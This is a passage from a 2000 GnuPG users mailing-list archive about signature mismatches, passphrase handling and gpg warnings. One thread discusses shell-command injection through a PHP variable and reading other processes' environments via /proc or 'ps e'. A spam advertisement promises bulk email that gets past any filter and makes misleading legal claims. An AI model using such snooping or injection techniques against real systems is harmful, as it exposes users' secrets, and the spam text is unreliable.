signature is good. But GPG 1.0.4 says the signature is bad. I looked in IK> the FAQ, the HowTos, the GPH and the mailing list archive but I still IK> got no clue. Under Windows, I got a good sig with PGP 6.5.8 and GnuPG 1.0.4. Graham reply to: graham@todd276.worldonline.co.uk -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Ralf.Huels@schufa.de Tue Dec 5 14:15:53 2000 From: Ralf.Huels@schufa.de (Huels, Ralf KSV) Date: 5 Dec 2000 15:15:53 +0100 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 Message-ID: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002> > Under Windows, I got a good sig with PGP 6.5.8 and GnuPG 1.0.4. And I got a bad sig with GnuPG 1.0.4. The file seems to have Unix style newlines (0x0A instead of 0x0D0A). I suspect it´s some conversion issue with charset or newline characters. Tschüß, Ralf -- Ralf Hüls Bismarckplatz KSV Kreditschutz-Vereinigung GmbH 44866 Bochum Score-Consult Tel. 02327/9114-28 http://www.schufa.de/ Fax. 02327/8 40 27 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jackmc-gnupg-users@lorentz.com Tue Dec 5 15:54:14 2000 From: jackmc-gnupg-users@lorentz.com (Jack McKinney) Date: Tue, 5 Dec 2000 09:54:14 -0600 Subject: Gnu-pg reviewed by german newspaper In-Reply-To: <51896D38E5E4D111BE560001FA68BA368456B2@SBO1002>; from Ralf.Huels@schufa.de on Tue, Dec 05, 2000 at 07:58:31AM +0100 References: <51896D38E5E4D111BE560001FA68BA368456B2@SBO1002> Message-ID: <20001205095414.A14731@stocks.pillory.com> --Nq2Wo0NMKNjxTN9z Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Translation of previous posting (babelfish.altavista.com): The popular encoding program Pretty Good Privacy (PGP) got a competition wh= ich can be taken seriously: Gnu Privacy Guard (Gnu PG). Safety experts from all world call the program one = of the best encoding systems on the market. Even from official page there is support. Thus for example the Fede= ral Ministry for Economic Affairs belongs to the promoters of the program. Actually a E-Mail has in fact the status o= f a postcard. Practically everyone can along-read the message. It can change and to the addressee pass it on even = without knowledge of sender and recipient. Who wants to prevent that, an encoding program must use. The sof= tware most popular with distance is Pretty Good Privacy. But some openly put weak points to have many users fri= ghtens.=20 The encoding program Pretty Good Privacy applied with its conception as abs= olutely safe system. If PGP with the sender and recipient are in the use, the Mitlesen of confidential Mails is = almost excluded through third. PGP checked automatically, whether the Mail was changed during the feed of the sender t= o the recipient, and supplies a high-grade safe digital signature. The used procedure for the encoding offe= rs an enormous number of different codes. A value not crackable after today's yardsticks.=20 But PGP is guessed/advised into the criticism. The software with the source= text is delivered, but the manufacturer for itself wants to keep some secrets. Thus PGP permits the mechanism of th= ird keys, whereby many users lost the confidence into the safety software. Already since some time rumors circula= te that national organizations can along-read as for example the US data police national Security Agency (NSA)= encoded Mails with the help of a general key. Safety experts warn therefore already for a long time to trust= PGP blindly. Differently it looks with the Gnu Privacy Guard. The free program is constantly improved and extended by = many " leisure programmers ". Since to it the entire source text must be for order, also no secret back doors c= an be inserted. For the first time Gnu PG was introduced by the Duesseldorfer Werner cook in September 1999 for the opera= ting system Unix. Since then is the software for numerous other systems available, among them also for Windows = 9x, Windows NT, Linux, OS/2 and Sun OS.=20 -- "There is no parameter that makes it impossible Jack McKinney for you to perform still more excellently." jackmc@lorentz.com -Mario Cuomo, on the lack of a clock in baseball http://www.lorentz.c= om 1024D/D68F2C07 4096g/38AEF076 --Nq2Wo0NMKNjxTN9z Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjotD6YACgkQimeon9aPLAeQ+gCfRGzVhoP8QFVocpG9W/34hMWv azMAmwXefsiRlk+gPKxGVZba2bIU4Hvt =D+AD -----END PGP SIGNATURE----- --Nq2Wo0NMKNjxTN9z-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jackmc-gnupg-users@lorentz.com Tue Dec 5 15:57:09 2000 From: jackmc-gnupg-users@lorentz.com (Jack McKinney) Date: Tue, 5 Dec 2000 09:57:09 -0600 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 In-Reply-To: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002>; from Ralf.Huels@schufa.de on Tue, Dec 05, 2000 at 03:15:53PM +0100 References: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002> Message-ID: <20001205095708.B14731@stocks.pillory.com> --DKU6Jbt7q3WqK7+M Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Big Brother tells me that Huels, Ralf KSV wrote: > > Under Windows, I got a good sig with PGP 6.5.8 and GnuPG 1.0.4. >=20 > And I got a bad sig with GnuPG 1.0.4. The file seems to have Unix style > newlines (0x0A instead of 0x0D0A). I suspect it=B4s some conversion issue= =20 > with charset or newline characters. See the '--textmode' option. -- "I'm walking home from school, and I'm watching Jack McKinney some men building a new house, and the guy jackmc@lorentz.com hammering on the roof calls me a paranoid little http://www.lorentz.c= om weirdo.... in Morse code." 1024D/D68F2C07 4096g= /38AEF076 -Emo Philips --DKU6Jbt7q3WqK7+M Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjotEFQACgkQimeon9aPLAdeOQCgmb8c1R0UOIBsROd/yW/0DTbs 6XEAn29a6PQ+lEmHLMGzQyJ9/UkdCBRD =inbD -----END PGP SIGNATURE----- --DKU6Jbt7q3WqK7+M-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Tue Dec 5 17:14:54 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Tue, 5 Dec 2000 18:14:54 +0100 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 In-Reply-To: <20001205095708.B14731@stocks.pillory.com> References: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002> <20001205095708.B14731@stocks.pillory.com> Message-ID: <00120518145405.18426@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tuesday, 5. December 2000 16:57, Jack McKinney wrote: > Big Brother tells me that Huels, Ralf KSV wrote: > > > Under Windows, I got a good sig with PGP 6.5.8 and GnuPG 1.0.4. > > > > And I got a bad sig with GnuPG 1.0.4. The file seems to have Unix > > style newlines (0x0A instead of 0x0D0A). I suspect it´s some > > conversion issue with charset or newline characters. > > See the '--textmode' option. In my original posting I forgot to tell you that I use GnuPG on Linux. gpg --verify --textmode <*the attached file in my original posting* gives the following output: gpg: Signature made Mon 04 Dez 2000 21:54:06 MET using DSA key ID 2D8DD64A gpg: BAD signature from "Michael Haeckel " The same command line without '--textmode' gives the same output. So the '--textmode' option doesn't seem to be the solution. After some research I found out how the message with the good/bad signature was composed. Because of a bug (or a feature) PGP 5.0i isn't able to clearsign a message if this message contains 8-bit characters (like german umlauts). Therefore the developers of KMail programmed a work around. The message is first signed with a detached signature and then a clearsigned message is composed as follows: "-----BEGIN PGP SIGNED MESSAGE-----\n\n" + unsigned_message + "\n" + detached_signature Now the question is: Why do PGP 5.0i (under Linux), PGP 6.5.8 (under Linux and Windows) and (according to Graham) even GnuPG 1.0.4 (under Windows) accept this message as correctly signed while GnuPG 1.0.4 (under Linux) doesn't accept the signature? There seems to be some weird discrepancy between the Windows and the Linux version of GnuPG. Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6LSKPqUQWN/hplRsRAndaAKCljbesTedkxBOwitKUEPj7jjuFLACghRsG IL9K9yYf0agkw2GGy75FDYI= =7Woj -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Tue Dec 5 20:46:16 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Tue, 5 Dec 2000 12:46:16 -0800 Subject: possible security hole References: <000c01c05e68$c1667160$01a800c0@derekvok><20001205083329.A20381@gnupg.de> Message-ID: <000e01c05efc$6bf10120$01a800c0@derekvok> There is no telnet access or any other command line access to anyone other than root on this server. Is there a way to examine the environment of the shell process strictly through cgi? ----- Original Message ----- From: "Florian Weimer" To: Sent: Tuesday, December 05, 2000 4:31 AM Subject: Re: possible security hole > Werner Koch writes: > > > On Mon, 4 Dec 2000, Derek Vokey wrote: > > > > > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail > > > to\@me.com" > > > > I don't know PHP, but I assume that you are using something like > > system(3) to this job. The problem is that you might be able to > > trick the shell in doing evil thing by having shell code in > > $seinsitiveinfo. > > > > Some possible solutions: > > > > * sanitize $sensitiveinfo by removing all characters except for > > digits, underscore, space and letters :-) > > If you do this, other (non-privileged) users on the same machine are > able to retrieve $sensitiveinfo by examining the environment of the > shell process. > > -- > Florian Weimer Florian.Weimer@RUS.Uni-Stuttgart.DE > University of Stuttgart http://cert.uni-stuttgart.de/ > RUS-CERT +49-711-685-5973/fax +49-711-685-5898 > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Tue Dec 5 17:52:36 2000 From: wk@gnupg.org (Werner Koch) Date: Tue, 5 Dec 2000 18:52:36 +0100 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 In-Reply-To: <00120518145405.18426@atlas>; from ingo@mathA.rwth-aachen.de on Tue, Dec 05, 2000 at 06:14:54PM +0100 References: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002> <20001205095708.B14731@stocks.pillory.com> <00120518145405.18426@atlas> Message-ID: <20001205185236.G20381@gnupg.de> On Tue, 5 Dec 2000, Ingo Kloecker wrote: > The same command line without '--textmode' gives the same output. --textmode does only work on the encoding side. > "-----BEGIN PGP SIGNED MESSAGE-----\n\n" + unsigned_message + "\n" + > detached_signature Probably KMail did not generate the detached_signature in textmode, whcih is required. > Why do PGP 5.0i (under Linux), PGP 6.5.8 (under Linux and Windows) and PGP 5.0i is really buggy - don't use it. > There seems to be some weird discrepancy between the Windows and the > Linux version of GnuPG. The only difference is the way lineendings are handled: CR,LF for Windows, LF for Unix. However if a signature is created in textmode, this does not matter. Trailing whitespaces may be another problem. See the ML archive for details. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Tue Dec 5 22:36:32 2000 From: lists@wordit.com (Marcus) Date: Tue, 05 Dec 2000 23:36:32 +0100 Subject: Passphrase from external program, script, or batch file In-Reply-To: <000e01c05efc$6bf10120$01a800c0@derekvok> References: <000c01c05e68$c1667160$01a800c0@derekvok> <20001205083329.A20381@gnupg.de> <000e01c05efc$6bf10120$01a800c0@derekvok> Message-ID: <200012052336320524.00616640@smtprelay.t-online.de> Since there were no replies on how to send the passphrase via the command line in Windows/DOS, how does it work on Unix? I saw something like --passphrase-fd in the archive, but I don't understand what it means or is really doing. Can anybody explain? Maybe with that I can ask some Perl people how it might be done in Perl on Windows. Btw, I looked at the Perl modules for GPG and they all seem very Unix specific, using pipes and forking which I don't think will work on Windows. One module failed because it reads the Unix path variable, and couldn't read the path on Windows correctly. Thanks, Marcus Friedlaender -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From johanw@vulcan.xs4all.nl Tue Dec 5 23:07:10 2000 From: johanw@vulcan.xs4all.nl (Johan Wevers) Date: Wed, 6 Dec 2000 00:07:10 +0100 (MET) Subject: Passphrase from external program, script, or batch file In-Reply-To: <200012052336320524.00616640@smtprelay.t-online.de> from Marcus at "Dec 5, 2000 11:36:32 pm" Message-ID: <200012052307.AAA00765@vulcan.xs4all.nl> Marcus wrote: > I saw something like --passphrase-fd in the archive, but I don't > understand what it means or is really doing. Can anybody explain? A file descriptor is an even more low-level function than a file. They are represented by numbers, 0 = standard input, 1 = standard output and 2 = standard error (on DOS, stderr == stdout, NT follows the unix convention here). However, you can also open higher numbers. If you have opened such an fd, you can send data through it via something that is called a pipe. One end sends data, the other end reads it (for 2-way communication you'll have to open 2 fd's). Opening a fd and a pipe to send data through it are standard methods in many programming languages, including C and perl. More information about fd's can be found in K&R chapter 8, and for piping through an fd I have some example code in C (unix specific I'm affraid, but the piping might also work in windows) if you're interested (a program I once wrote to communicate this way with pgp 2.6.3). -- ir. J.C.A. Wevers // Physics and science fiction site: johanw@vulcan.xs4all.nl // http://www.xs4all.nl/~johanw/index.html PGP/GPG public keys at http://www.xs4all.nl/~johanw/pgpkeys.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From gadicath@yahoo.com Wed Dec 6 02:24:27 2000 From: gadicath@yahoo.com (David) Date: Wed, 6 Dec 2000 13:24:27 +1100 Subject: Depreciated algorithm Message-ID: <20001206132427.A3135@interact.net.au> --mP3DRpeJDSE+ciuQ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi just wondering why I get: =09 gpg: ELG-E/RIJNDAEL encrypted gpg: this cipher algorithm is depreciated; please use a more standard one! This only occurs when people use my key to encrypt... I can stop it from happening if I use --cipher-algo BLOWFISH. Just wondering why its happening and how I could stop it from happening. Thanks in advance David --mP3DRpeJDSE+ciuQ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6LaNbBQgClllX9yMRAsS5AJ9JiIzXXHchkbt+cWkS43Y+i/OS+gCfc9fa MipmDpw4el9crMAnmaAMdiA= =jKVS -----END PGP SIGNATURE----- --mP3DRpeJDSE+ciuQ-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Wed Dec 6 03:21:31 2000 From: lists@wordit.com (Marcus) Date: Wed, 06 Dec 2000 04:21:31 +0100 Subject: Windows shell woes (was: Passphrase from external program...) In-Reply-To: <200012052307.AAA00765@vulcan.xs4all.nl> References: <200012052307.AAA00765@vulcan.xs4all.nl> Message-ID: <200012060421310509.008D46F7@smtprelay.t-online.de> On 06.12.00 at 00:07 Johan Wevers wrote: >A file descriptor is an even more low-level function than a file... Thanks, I understand how it works now. The only thing I've got working on Windows is to use a file containing the passphrase. The script could create a temporary file, but I don't feel too pleased about having a password stored in a file at all. I guess one could encrypt the temp file before it's written. This is it in Perl: system "gpg.exe -o $file.gpg --passphrase-fd 0 -c $file < pass.txt"; Windows will only accept a file as input, grrr. Does anybody know how to pass the input from stdin? The only workaround I can think of is to >More information about fd's can be found in K&R chapter 8, and for piping through an fd... I'll take a peek. >I have some example code in C (unix specific I'm affraid, >but the piping might also work in windows) if you're interested (a program >I once wrote to communicate this way with pgp 2.6.3). Yes please. Thanks, Marcus Friedlaender -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Tue Dec 5 22:34:04 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 05 Dec 2000 23:34:04 +0100 Subject: possible security hole In-Reply-To: <000e01c05efc$6bf10120$01a800c0@derekvok> References: <000c01c05e68$c1667160$01a800c0@derekvok> <20001205083329.A20381@gnupg.de> <000e01c05efc$6bf10120$01a800c0@derekvok> Message-ID: <873dg2ijkz.fsf@deneb.enyo.de> "Derek Vokey" writes: > There is no telnet access or any other command line access to anyone other > than root on this server. Is there a way to examine the environment of the > shell process strictly through cgi? What does "strictly through cgi" mean? If you allow uploading arbitrary CGI programs by users, that's almost equivalent to shell access and certainly sufficient for reading the environment of other processes, at least on Linux (where you can read /proc) and some other systems (where you can invoke 'ps e'). > ----- Original Message ----- Eh, your quoting style is strange. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Wed Dec 6 08:05:42 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Wed, 6 Dec 2000 09:05:42 +0100 (CET) Subject: Depreciated algorithm In-Reply-To: <20001206132427.A3135@interact.net.au> References: <20001206132427.A3135@interact.net.au> Message-ID: <14893.62294.740991.101852@barber.fmi.uni-passau.de> >>>"D" == David writes: D> Hi just wondering why I get: D> gpg: ELG-E/RIJNDAEL encrypted D> gpg: this cipher algorithm is depreciated; please use a more standard one! D> This only occurs when people use my key to encrypt... I can stop it D> from happening if I use --cipher-algo BLOWFISH. You are using 1.0.4 that wrongly issues this warning. Just ignore it or search for a patch in the ML archive. The next release will fix this. Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From gadicath@yahoo.com Wed Dec 6 08:11:38 2000 From: gadicath@yahoo.com (David) Date: Wed, 6 Dec 2000 19:11:38 +1100 Subject: Depreciated algorithm In-Reply-To: <14893.62294.740991.101852@barber.fmi.uni-passau.de>; from Nils@InfoSun.FMI.Uni-Passau.De on Wed, Dec 06, 2000 at 09:05:42AM +0100 References: <20001206132427.A3135@interact.net.au> <14893.62294.740991.101852@barber.fmi.uni-passau.de> Message-ID: <20001206191137.A9857@interact.net.au> Thanks David -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bn2bn1@yahoo.com Tue Dec 5 10:07:27 2000 From: bn2bn1@yahoo.com (bn2bn1@yahoo.com) Date: 05 Dec 00 10:07:27 AM Subject: . Message-ID: The Internet's Finest and Most Reliable Bulk Email Provider! Since 1996, TechData has provided bulk email service to thousands of well-satisfied customers. We offer the most competitive prices in the industry, made possible by our high percentage of repeat business. We have the most advanced, direct email technology, employed by only a knowledgeable few in the world. Our expert programmers have made it possible for us to penetrate any email blocking filter in use. We have over 120 million active email addresses, increasing our list at the rate of half a million to one million a month. We will put your product or service instantly and directly into the hands of millions of prospects! You will have instant, guaranteed results, something no other form of marketing can claim. Our turn around time is a remarkable 24 hours. Our email addresses are sorted by country, state and target. Your marketing campaign will speed with pinpoint accuracy to your desired audience! Your message can be presented in any language you wish, as plain text if you desire simplicity, or in html with color and graphics. Call us for a free consultation at (323)- 851- 8386 [U.S.A.]. We are open 24 hours a day, 7 days a week. No one understands the global market like we do. For a limited time, take advantage of our holiday special -- two million general U.S. emails for just $450 per million! We include, at no cost, a bullet proof email address for 30 days, a $400 value! BULK EMAIL PRICES 500,000........................$375 750,000........................$562 1,200,000........................$720 1,600,000.................. ...$960 3,000,000......................$1,500 3,000,000+ ...................PLEASE CALL FOR A QUOTE Resellers welcome. We accept Visa, MasterCard and check by FAX. DON'T WAIT! LET TECHDATA BE YOUR PARTNER!! Under Bill s.1618 TITLE III passed by the 105th U.S. Congress this letter is not considered "spam" as long as we include: 1) contact information and, 2) the way to be removed from future mailings (see below).To Remove Yourself From This List: reply to this email with the email address that you would like removed and the word REMOVE in the subject heading. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Wed Dec 6 10:32:44 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Wed, 6 Dec 2000 10:32:44 +0000 Subject: Depreciated algorithm In-Reply-To: <14893.62294.740991.101852@barber.fmi.uni-passau.de>; from Nils@infosun.fmi.uni-passau.de on Wed, Dec 06, 2000 at 09:05:42AM +0100 References: <20001206132427.A3135@interact.net.au> <14893.62294.740991.101852@barber.fmi.uni-passau.de> Message-ID: <20001206103244.A4724@nmrc.ie> > You are using 1.0.4 that wrongly issues this warning. Just ignore it or > search for a patch in the ML archive. The next release will fix this. I hope the next release also fixes the speling ;-) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From dgc@uchicago.edu Wed Dec 6 11:37:54 2000 From: dgc@uchicago.edu (David Champion) Date: Wed, 6 Dec 2000 05:37:54 -0600 Subject: Depreciated algorithm In-Reply-To: <20001206103244.A4724@nmrc.ie>; from lhecking@nmrc.ie on Wed, Dec 06, 2000 at 10:32:44AM +0000 References: <20001206132427.A3135@interact.net.au> <14893.62294.740991.101852@barber.fmi.uni-passau.de> <20001206103244.A4724@nmrc.ie> Message-ID: <20001206053754.M1701@smack.uchicago.edu> On 2000.12.06, in <20001206103244.A4724@nmrc.ie>, "Lars Hecking" wrote: > > > You are using 1.0.4 that wrongly issues this warning. Just ignore it or > > search for a patch in the ML archive. The next release will fix this. > > I hope the next release also fixes the speling ;-) I'm glad I'm not the only one with a deprecated peeve. I appreciate the support. The distinction has depreciated quite a lot over recent years, but I apprecate that this improves with some exposure. :) -- -D. dgc@uchicago.edu NSIT University of Chicago -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From adler@bnl.gov Wed Dec 6 12:36:53 2000 From: adler@bnl.gov (Stephen Adler) Date: Wed, 6 Dec 2000 12:36:53 +0000 Subject: openPG aware gui mail clients Message-ID: <1001206123653.ZM11048@ssadler.phy.bnl.gov> Can someone recomend an openPG gui mail client? Thanks. Steve. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Wed Dec 6 13:01:32 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Wed, 6 Dec 2000 14:01:32 +0100 Subject: openPG aware gui mail clients In-Reply-To: <1001206123653.ZM11048@ssadler.phy.bnl.gov> References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> Message-ID: <00120614013202.31997@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday, 6. December 2000 13:36, Stephen Adler wrote: > Can someone recomend an openPG gui mail client? Try KMail (from KDE 2.0(.1)). Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6LjitqUQWN/hplRsRAmJxAJ9cN1CM8o3XWlXMbSjEYdjC1JaQLgCdGJxK MYuRy2/LaD3igV0HxVWCpH8= =vWGm -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Wed Dec 6 13:24:54 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Wed, 06 Dec 2000 13:24:54 GMT Subject: GnuPG plug-in for Pegasus (Windows) Message-ID: <20001206132214.335A.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I remember seeing a URL for a GnuPG plug-in for the freeware Pegasus MUA under Windows, but I can't locate it now. Has anybody got any info. on this? Graham reply to: graham@todd276.worldonline.co.uk -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) Comment: Please use my PGP Key ID: 0x99DB10BD iD8DBQE6Lj4XtwKLKus4nE4RAntpAJ468TMYuPFfyHYSw+ttZ6zTiQiw/ACgo65J 74vAOyyNfXlMfgOfTvjpJ+KIPwMFATouPhe3Aosq6zicThECe2kAoKbvDekStfgU HUxqpqzXEKBBdmjqAKCS/mU3+nxmyUD0AfaqSoDsTvfyXw== =qNTC -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Wed Dec 6 17:00:06 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Wed, 6 Dec 2000 09:00:06 -0800 Subject: Fw: possible security hole Message-ID: <000d01c05fa5$fd26e0c0$01a800c0@derekvok> ----- Original Message ----- From: "Derek Vokey" To: "Florian Weimer" Sent: Wednesday, December 06, 2000 8:58 AM Subject: Re: possible security hole > > > > There is no telnet access or any other command line access to anyone > other > > > than root on this server. Is there a way to examine the environment of > the > > > shell process strictly through cgi? > > What does "strictly through cgi" mean? If you allow uploading > > arbitrary CGI programs by users, that's almost equivalent to shell > > access and certainly sufficient for reading the environment of other > > processes, at least on Linux (where you can read /proc) and some other > > systems (where you can invoke 'ps e'). > > yes they can upload arbitrary cgi and invoke ps -e via exec (and I apologize > for my ignorance here) but please explain how to read the environment of a > process that has already occured or sleeping. If i try "more > /proc/'mypid'/environ I get permission denied. > > Hasn't the process already passed by the time someone tries to access it or > does it remain in memory. Is the time delay not a measure of protection? If > not, would it not be possible to unset($sensitiveinfo) so the the script > terminates with an invalid value for it? (I guess I don't really understand) > I have been able to see the command line of the script that I am currently > executing with ps but not of past ones. > > Please understand that I am not being argumentative - I really need to know. > Could you please share some commands on how to do this? > > > Eh, your quoting style is strange. > > My first mailing list - I'm working on it. > > Thanks > Derek > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Wed Dec 6 15:33:48 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Wed, 6 Dec 2000 16:33:48 +0100 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 In-Reply-To: <20001205185236.G20381@gnupg.de> References: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002> <00120518145405.18426@atlas> <20001205185236.G20381@gnupg.de> Message-ID: <00120610114507.18426@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tuesday, 5. December 2000 18:52, Werner Koch wrote: > On Tue, 5 Dec 2000, Ingo Kloecker wrote: > > "-----BEGIN PGP SIGNED MESSAGE-----\n\n" + unsigned_message + "\n" > > + detached_signature > > Probably KMail did not generate the detached_signature in textmode, > whcih is required. The detached_signature was generated via 'pgps -batf', where 't' is textmode and 'a' ASCII armor. So it should be generated in textmode. But as you already said PGP 5.0i is really buggy. If a mail (or something else) you want to sign contains 8-bit characters PGP 5.0i always generates a type 0x00 signature (a signature of a binary document). Therefore GnuPG can't handle it correctly (and it doesn't have to). > > Why do PGP 5.0i (under Linux), PGP 6.5.8 (under Linux and Windows) > > and > > PGP 5.0i is really buggy - don't use it. I don't use it. The problem is that there are other people who use it. I just want to check their signatures. But this seems to be not possible. I'll try to convince these people to switch to GnuPG (or PGP 6). Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6LlxcqUQWN/hplRsRAhAgAKDCctuxtZIVMD5FQkRBuIuLVSdIugCgpzw1 bllzol8zIsvUBRxzVl2oK4o= =xszu -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From afx@atsec.com Wed Dec 6 16:19:01 2000 From: afx@atsec.com (Andreas Siegert) Date: Wed, 6 Dec 2000 17:19:01 +0100 Subject: waiting for lock... Message-ID: <20001206171901.A3932@cray.muc.atsec.de> Hi, what would that mean: $ gpg --no-verbose --batch --with-colons --list-keys 2CAE19B6 gpg: waiting for lock (hold by 1407 - probably dead) ... gpg: waiting for lock (hold by 1407 - probably dead) ... gpg: waiting for lock (hold by 1407 - probably dead) ... gpg 1.0.4 on a SuSE 6.4 system. It prevents mutt (1.2) from finding keys. thx afx -- atsec information security GmbH Phone: +49-89-44249830 Steinstrasse 68 Fax: +49-89-44249831 D-81667 Muenchen, Germany WWW: www.atsec.com May the Source be with you! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Wed Dec 6 16:24:17 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Wed, 6 Dec 2000 16:24:17 +0000 Subject: waiting for lock... In-Reply-To: <20001206171901.A3932@cray.muc.atsec.de>; from afx@atsec.com on Wed, Dec 06, 2000 at 05:19:01PM +0100 References: <20001206171901.A3932@cray.muc.atsec.de> Message-ID: <20001206162417.A1388@nmrc.ie> Hi Andreas :) > what would that mean: > > $ gpg --no-verbose --batch --with-colons --list-keys 2CAE19B6 > gpg: waiting for lock (hold by 1407 - probably dead) ... > gpg: waiting for lock (hold by 1407 - probably dead) ... > gpg: waiting for lock (hold by 1407 - probably dead) ... Just go into ~/.gnupg and delete all .#* files. They must have been left behind when the program exited abnormally. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Wed Dec 6 17:44:09 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Wed, 6 Dec 2000 17:44:09 +0000 Subject: GPG signing problem Message-ID: <20001206174409.A1875@nmrc.ie> Dunno if this is a mutt or gpg problem ... When I'm trying to "sign as" with my DSA 